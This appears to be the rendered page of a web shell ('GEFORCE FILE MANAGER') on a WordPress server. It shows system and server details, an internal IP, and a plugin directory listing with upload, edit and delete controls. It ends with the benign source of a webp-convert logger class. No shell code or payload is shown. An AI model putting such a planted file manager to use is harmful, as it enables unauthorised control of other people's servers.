[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
rosell-dk
/
webp-convert
/
src
/
Loggers
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 BaseLogger.php
997 B
SET
[ EDIT ]
|
[ DEL ]
📄 BufferLogger.php
2,928 B
SET
[ EDIT ]
|
[ DEL ]
📄 EchoLogger.php
885 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: BaseLogger.php
<?php namespace WebPConvert\Loggers; /** * Base for all logger classes. * * WebPConvert can provide insights into the conversion process by means of accepting a logger which * extends this class. * * @package WebPConvert * @author Bjørn Rosell <it@rosell.dk> * @since Class available since Release 2.0.0 */ abstract class BaseLogger { /** * Write a message to the log * * @param string $msg message to log * @param string $style style (null | bold | italic) * @return void */ abstract public function log($msg, $style = ''); /** * Add new line to the log * @return void */ abstract public function ln(); /** * Write a line to the log * * @param string $msg message to log * @param string $style style (null | bold | italic) * @return void */ public function logLn($msg, $style = '') { $this->log($msg, $style); $this->ln(); } }